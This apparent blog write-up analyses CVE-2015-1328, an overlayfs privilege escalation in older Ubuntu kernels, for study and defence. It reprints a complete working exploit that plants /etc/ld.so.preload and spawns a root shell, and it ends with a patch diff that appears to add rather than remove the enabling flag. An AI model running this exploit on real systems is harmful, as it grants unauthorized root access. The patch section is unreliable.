Contents
0. Introduction
1. Description
2. Affected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix
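0. Introduction
The steady development of new, high-performance technologies keeps expanding what operating systems can do. Virtualization technologies that have emerged in recent years, including the overlayfs layered (union) filesystem, give increasingly strong technical support to container solutions such as Docker, but they also bring many security problems.
Leaving aside traditional overflow-type vulnerabilities, there is another class of "feature-type" vulnerabilities: an attacker takes functionality that the system natively provides, combines it in specially designed ways, and achieves unintended results, up to and including root.
This is another reminder that defending against attackers at the system layer requires understanding the system's own features more deeply than the attackers do, including how those features combine under extreme conditions, because such combinations may well turn into attack vectors.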
1. Description
Philip Pettersson discovered a privilege escalation when using overlayfs mounts inside of user namespaces. A local user could exploit this flaw to gain administrative privileges on the system
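Ubuntu releases in their default configuration are affected by CVE-2015-1328, which allows local privilege escalation to root: when new files are created in the upper filesystem directory, overlayfs does not properly check file permissions.
The flaw can be exploited by an unprivileged process on kernels built with CONFIG_USER_NS=y where overlayfs carries the FS_USERNS_MOUNT flag, which allows overlayfs to be mounted inside unprivileged mount namespaces.
This is the default configuration of Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].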
0x1: Overlay Filesystem
Relevant Link:
https://security-tracker.debian.org/tracker/CVE-2015-1328
http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html
http://www.freebuf.com/news/70615.html
http://seclists.org/oss-sec/2015/q2/717
https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt
http://www.cnblogs.com/LittleHann/p/4083943.html // search for: 0x4: overlayfs
2. Affected Scope
Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
3. Exploit Analysis
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>" \
    "uid_t(*_real_getuid) (void);" \
    "char path[128];" \
    "uid_t getuid(void)" \
    "{" \
    "_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");" \
    "readlink(\"/proc/self/exe\", (char *) &path, 128);" \
    "if(geteuid() == 0 && !strcmp(path, \"/bin/su\"))" \
    "{\nunlink(\"/etc/ld.so.preload\");" \
    "unlink(\"/tmp/ofs-lib.so\");" \
    "setresuid(0, 0, 0);" \
    "setresgid(0, 0, 0);" \
    "execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);" \
    "}" \
    "return _real_getuid();" \
    "}"

static char child_stack[1024*1024];

static int child_exec(void *stuff)
{
    char *file;

    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL,
              "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL,
                  "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else
        file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    chdir("/");
    umount("/tmp/ns_sploit/o");

    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL,
              "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL,
                  "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    // Create a child process
    if((wrapper = fork()) == 0) {
        // Move the child into a new user namespace, separate from the parent
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        // The child forks again
        if((init = fork()) == 0) {
            // The new child starts executing at child_exec and runs in a new mount namespace
            pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
            waitpid(pid, &status, 0);
        }
        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);
    wait(NULL);
    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
Relevant Link:
http://cxsecurity.com/issue/WLB-2015060081
https://www.exploit-db.com/exploits/37292/
4. Principle Of Vulnerability
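Using the API calls and features that the POC relies on as clues, we walk through the relevant overlayfs "features" step by step and show how they end up forming an attack vector.
0x1: Passing CLONE_NEWNS when creating the child process
Note the following lines of the POC, which involve the unshare() call and the CLONE_NEWNS flag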
..
// Create a child process
if((wrapper = fork()) == 0) {
    // Move the child into a new user namespace, separate from the parent
    if(unshare(CLONE_NEWUSER) != 0)
        fprintf(stderr, "failed to create new user namespace\n");

    // The child forks again
    if((init = fork()) == 0) {
        // The new child starts executing at child_exec and runs in a new mount namespace
        pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
..
/source/kernel/fork.c
/*
 * unshare allows a process to 'unshare' part of the process
 * context which was originally shared using clone. copy_*
 * functions used by do_fork() cannot be used here directly
 * because they modify an inactive task_struct that is being
 * constructed. Here we are modifying the current, active,
 * task_struct.
 */
SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags)
{
    int err = 0;
    struct fs_struct *fs, *new_fs = NULL;
    struct sighand_struct *new_sigh = NULL;
    struct mm_struct *mm, *new_mm = NULL, *active_mm = NULL;
    struct files_struct *fd, *new_fd = NULL;
    struct nsproxy *new_nsproxy = NULL;
    int do_sysvsem = 0;

    check_unshare_flags(&unshare_flags);

    /* Return -EINVAL for all unsupported flags */
    err = -EINVAL;
    if (unshare_flags & ~(CLONE_THREAD|CLONE_FS|CLONE_NEWNS|CLONE_SIGHAND|
                CLONE_VM|CLONE_FILES|CLONE_SYSVSEM|
                CLONE_NEWUTS|CLONE_NEWIPC|CLONE_NEWNET))
        goto bad_unshare_out;

    /*
     * CLONE_NEWIPC must also detach from the undolist: after switching
     * to a new ipc namespace, the semaphore arrays from the old
     * namespace are unreachable.
     */
    if (unshare_flags & (CLONE_NEWIPC|CLONE_SYSVSEM))
        do_sysvsem = 1;
    if ((err = unshare_thread(unshare_flags)))
        goto bad_unshare_out;
    if ((err = unshare_fs(unshare_flags, &new_fs)))
        goto bad_unshare_cleanup_thread;
    if ((err = unshare_sighand(unshare_flags, &new_sigh)))
        goto bad_unshare_cleanup_fs;
    if ((err = unshare_vm(unshare_flags, &new_mm)))
        goto bad_unshare_cleanup_sigh;
    if ((err = unshare_fd(unshare_flags, &new_fd)))
        goto bad_unshare_cleanup_vm;
    if ((err = unshare_nsproxy_namespaces(unshare_flags, &new_nsproxy,
            new_fs)))
        goto bad_unshare_cleanup_fd;

    if (new_fs || new_mm || new_fd || do_sysvsem || new_nsproxy) {
        if (do_sysvsem) {
            /*
             * CLONE_SYSVSEM is equivalent to sys_exit().
             */
            exit_sem(current);
        }

        if (new_nsproxy) {
            switch_task_namespaces(current, new_nsproxy);
            new_nsproxy = NULL;
        }

        task_lock(current);

        if (new_fs) {
            fs = current->fs;
            write_lock(&fs->lock);
            current->fs = new_fs;
            if (--fs->users)
                new_fs = NULL;
            else
                new_fs = fs;
            write_unlock(&fs->lock);
        }

        if (new_mm) {
            mm = current->mm;
            active_mm = current->active_mm;
            current->mm = new_mm;
            current->active_mm = new_mm;
            activate_mm(active_mm, new_mm);
            new_mm = mm;
        }

        if (new_fd) {
            fd = current->files;
            current->files = new_fd;
            new_fd = fd;
        }

        task_unlock(current);
    }

    if (new_nsproxy)
        put_nsproxy(new_nsproxy);

bad_unshare_cleanup_fd:
    if (new_fd)
        put_files_struct(new_fd);

bad_unshare_cleanup_vm:
    if (new_mm)
        mmput(new_mm);

bad_unshare_cleanup_sigh:
    if (new_sigh)
        if (atomic_dec_and_test(&new_sigh->count))
            kmem_cache_free(sighand_cachep, new_sigh);

bad_unshare_cleanup_fs:
    if (new_fs)
        free_fs_struct(new_fs);

bad_unshare_cleanup_thread:
bad_unshare_out:
    return err;
}
/source/kernel/fork.c
static struct task_struct *copy_process(unsigned long clone_flags,
                    unsigned long stack_start,
                    struct pt_regs *regs,
                    unsigned long stack_size,
                    int __user *child_tidptr,
                    struct pid *pid,
                    int trace)
{
    int retval;
    struct task_struct *p;
    int cgroup_callbacks_done = 0;

    /* 1. Validate the clone_flags passed in */
    if ((clone_flags & (CLONE_NEWNS|CLONE_FS)) == (CLONE_NEWNS|CLONE_FS))
        return ERR_PTR(-EINVAL);
    if ((clone_flags & CLONE_THREAD) && !(clone_flags & CLONE_SIGHAND))
        return ERR_PTR(-EINVAL);
    if ((clone_flags & CLONE_SIGHAND) && !(clone_flags & CLONE_VM))
        return ERR_PTR(-EINVAL);
    if ((clone_flags & CLONE_PARENT) &&
                current->signal->flags & SIGNAL_UNKILLABLE)
        return ERR_PTR(-EINVAL);
    ..
    /*
     * copy all the process information
     * Copy the parent's resources to the child according to clone_flags.
     * Resources that clone_flags marks as shared are shared between parent
     * and child: only the child's pointers are set, and the reference count
     * of the resource structure is incremented.
     */
    if ((retval = copy_semundo(clone_flags, p)))
        goto bad_fork_cleanup_audit;
    if ((retval = copy_files(clone_flags, p)))
        goto bad_fork_cleanup_semundo;
    if ((retval = copy_fs(clone_flags, p)))
        goto bad_fork_cleanup_files;
    if ((retval = copy_sighand(clone_flags, p)))
        goto bad_fork_cleanup_fs;
    if ((retval = copy_signal(clone_flags, p)))
        goto bad_fork_cleanup_sighand;
    if ((retval = copy_mm(clone_flags, p)))
        goto bad_fork_cleanup_signal;
    // Copy the namespaces
    if ((retval = copy_namespaces(clone_flags, p)))
    ..
/source/kernel/nsproxy.c
/*
 * called from clone. This now handles copy for nsproxy and all
 * namespaces therein.
 */
int copy_namespaces(unsigned long flags, struct task_struct *tsk)
{
    struct nsproxy *old_ns = tsk->nsproxy;
    struct nsproxy *new_ns;
    int err = 0;

    if (!old_ns)
        return 0;

    get_nsproxy(old_ns);

    // Check the flags
    if (!(flags & (CLONE_NEWNS | CLONE_NEWUTS | CLONE_NEWIPC |
                CLONE_NEWPID | CLONE_NEWNET)))
        return 0;

    if (!capable(CAP_SYS_ADMIN)) {
        err = -EPERM;
        goto out;
    }

    /*
     * CLONE_NEWIPC must detach from the undolist: after switching
     * to a new ipc namespace, the semaphore arrays from the old
     * namespace are unreachable. In clone parlance, CLONE_SYSVSEM
     * means share undolist with parent, so we must forbid using
     * it along with CLONE_NEWIPC.
     */
    if ((flags & CLONE_NEWIPC) && (flags & CLONE_SYSVSEM)) {
        err = -EINVAL;
        goto out;
    }

    // Create the new namespaces
    new_ns = create_new_namespaces(flags, tsk, tsk->fs);
    if (IS_ERR(new_ns)) {
        err = PTR_ERR(new_ns);
        goto out;
    }

    tsk->nsproxy = new_ns;

out:
    put_nsproxy(old_ns);
    return err;
}
/source/kernel/nsproxy.c
/*
 * Create new nsproxy and all of its the associated namespaces.
 * Return the newly created nsproxy. Do not attach this to the task,
 * leave it to the caller to do proper locking and attach it to task.
 */
static struct nsproxy *create_new_namespaces(unsigned long flags,
            struct task_struct *tsk, struct fs_struct *new_fs)
{
    struct nsproxy *new_nsp;
    int err;

    new_nsp = create_nsproxy();
    if (!new_nsp)
        return ERR_PTR(-ENOMEM);

    // Create the new mount namespace
    new_nsp->mnt_ns = copy_mnt_ns(flags, tsk->nsproxy->mnt_ns, new_fs);
    if (IS_ERR(new_nsp->mnt_ns)) {
        err = PTR_ERR(new_nsp->mnt_ns);
        goto out_ns;
    }
    ..
/source/fs/namespace.c
struct mnt_namespace *copy_mnt_ns(unsigned long flags, struct mnt_namespace *ns,
        struct fs_struct *new_fs)
{
    struct mnt_namespace *new_ns;

    BUG_ON(!ns);
    get_mnt_ns(ns);

    if (!(flags & CLONE_NEWNS))
        return ns;

    // Duplicate the mount namespace
    new_ns = dup_mnt_ns(ns, new_fs);

    put_mnt_ns(ns);
    return new_ns;
}
/source/fs/namespace.c
/*
 * Allocate a new namespace structure and populate it with contents
 * copied from the namespace of the passed in task structure.
 */
static struct mnt_namespace *dup_mnt_ns(struct mnt_namespace *mnt_ns,
        struct fs_struct *fs)
{
    struct mnt_namespace *new_ns;
    struct vfsmount *rootmnt = NULL, *pwdmnt = NULL;
    struct vfsmount *p, *q;

    new_ns = alloc_mnt_ns();
    if (IS_ERR(new_ns))
        return new_ns;

    down_write(&namespace_sem);
    /* First pass: copy the tree topology */
    new_ns->root = copy_tree(mnt_ns->root, mnt_ns->root->mnt_root,
                    CL_COPY_ALL | CL_EXPIRE);
    if (!new_ns->root) {
        up_write(&namespace_sem);
        kfree(new_ns);
        return ERR_PTR(-ENOMEM);
    }
    spin_lock(&vfsmount_lock);
    list_add_tail(&new_ns->list, &new_ns->root->mnt_list);
    spin_unlock(&vfsmount_lock);

    /*
     * Second pass: switch the tsk->fs->* elements and mark new vfsmounts
     * as belonging to new namespace. We have already acquired a private
     * fs_struct, so tsk->fs->lock is not needed.
     */
    p = mnt_ns->root;
    q = new_ns->root;
    while (p) {
        q->mnt_ns = new_ns;
        if (fs) {
            if (p == fs->root.mnt) {
                rootmnt = p;
                fs->root.mnt = mntget(q);
            }
            if (p == fs->pwd.mnt) {
                pwdmnt = p;
                fs->pwd.mnt = mntget(q);
            }
        }
        p = next_mnt(p, mnt_ns->root);
        q = next_mnt(q, new_ns->root);
    }
    up_write(&namespace_sem);

    if (rootmnt)
        mntput(rootmnt);
    if (pwdmnt)
        mntput(pwdmnt);

    return new_ns;
}
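Mounting overlayfs requires the CAP_SYS_ADMIN capability, so the POC first creates a new user namespace (CLONE_NEWUSER), inside which the process holds CAP_SYS_ADMIN. Even then, the mount only succeeds if the overlayfs filesystem type is registered with the FS_USERNS_MOUNT flag.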
0x2: Two overlayfs mount/umount cycles
The POC first creates the directories used by the exploit
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);
1. First mount
// Mount lowerdir (/proc/sys/kernel) and upperdir (/tmp/ns_sploit/upper) as an overlayfs at /tmp/ns_sploit/o
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL,
          "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
    // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
    // Fallback: mount lowerdir (/sys/kernel/security/apparmor), upperdir (/tmp/ns_sploit/upper)
    // and workdir (/tmp/ns_sploit/work) as an overlay at /tmp/ns_sploit/o
    if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL,
              "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0)
At this point either /proc/sys/kernel or, on newer kernels, /sys/kernel/security/apparmor has been mounted as the lowerdir at /tmp/ns_sploit/o
1. First mount: lowerdir=/proc/sys/kernel, upperdir=/tmp/ns_sploit/upper, mount point /tmp/ns_sploit/o
2. Then rename(file, "ld.so.preload") is called inside the mount point
3. This copies file from lowerdir up into upperdir and then renames it to ld.so.preload; the resulting file is owned by root
4. Then umount
First umount
umount("/tmp/ns_sploit/o");
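2. Second mount
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL,
          "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
    if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL,
              "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
The second mount builds on the result of the first
1. The first mount left a root-owned ld.so.preload file in /tmp/ns_sploit/upper
2. The second mount uses lowerdir=/tmp/ns_sploit/upper and upperdir=/etc, again mounted at /tmp/ns_sploit/o
3. Then chmod("/tmp/ns_sploit/o/ld.so.preload", 0777) is called. overlayfs works by merging two directories, and chmod, like rename, modifies the file; modifying a file that lives in lowerdir first copies it up into upperdir and then applies the change there
4. As a result, ld.so.preload is copied into /etc with mode 0777
5. The other key flaw is the permission check during this copy: overlayfs does not check whether the current user may write to upperdir, but whether the owner of the file being written may write to upperdir. This faulty check is what the second mount actually exploits, and it results in an unauthorized write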
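After this step, the attacker has gained the following
1. The attacker can read /etc/ld.so.preload through the overlayfs mount
2. Because of the flawed overlayfs permission check, the attacker can modify the contents of /etc/ld.so.preload
3. Using the ld.so.preload ring3 hijacking technique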
..
// Open /etc/ld.so.preload
fd = open("/etc/ld.so.preload",O_WRONLY);
..
// Compile the shared object used to hook the function
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
write(lib,LIB,strlen(LIB));
close(lib);
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
..
// Modify /etc/ld.so.preload to add the hook shared object
write(fd,"/tmp/ofs-lib.so\n",16);
close(fd);
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
..
The hook shared object
/*
 * Hooks getuid() and, inside the hook function, runs
 *     setresgid(0, 0, 0);
 *     execle("/bin/sh", "sh", "-i", NULL, NULL);
 * to obtain a root shell session directly
 */
#define LIB "#include <unistd.h>" \
    "uid_t(*_real_getuid) (void);" \
    "char path[128];" \
    "uid_t getuid(void)" \
    "{" \
    "_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");" \
    "readlink(\"/proc/self/exe\", (char *) &path, 128);" \
    "if(geteuid() == 0 && !strcmp(path, \"/bin/su\"))" \
    "{\nunlink(\"/etc/ld.so.preload\");" \
    "unlink(\"/tmp/ofs-lib.so\");" \
    "setresuid(0, 0, 0);" \
    "setresgid(0, 0, 0);" \
    "execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);" \
    "}" \
    "return _real_getuid();" \
    "}"
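To summarize the whole attack vector
1. The overlayfs mount semantics (lowerdir, upperdir) are a feature of the system and, strictly speaking, not a vulnerability
2. Through two mount/umount cycles, the attacker indirectly gains access to /etc/ld.so.preload
3. The crux is the flawed permission check for writes into upperdir: overlayfs does not check whether the current user may write to upperdir, but whether the owner of the file being written may write to upperdir. This lets the attacker perform unauthorized writes into upperdir by modifying files in lowerdir
4. overlayfs plays the preparatory role that an overflow would play in other attacks; what actually delivers the payload is a traditional Linux attack technique: LD_PRELOAD / ld.so.preload hijacking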
Relevant Link:
https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt
http://www.cnblogs.com/LittleHann/p/4083943.html // search for: 0x4: overlayfs
5. Patch Fix
0x1: Detection
Check whether /etc/ld.so.preload contains malicious content; if it does, treat it as a suspicious event
0x2: Fix
diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
@@ -816,6 +816,7 @@ static struct file_system_type ovl_fs_type = {
 	.name = "overlay",
 	.mount = ovl_mount,
 	.kill_sb = kill_anon_super,
+	.fs_flags = FS_USERNS_MOUNT,
 };
 MODULE_ALIAS_FS("overlay");
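0x3: Hotpatch approach
1. POC signature: the su process spawns a /bin/sh child process, which should not appear in a normal strace of su
2. Process-control rules can be set up to defend against su spawning child processes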
Relevant Link:
https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549
Copyright (c) 2015 Little5ann All rights reserved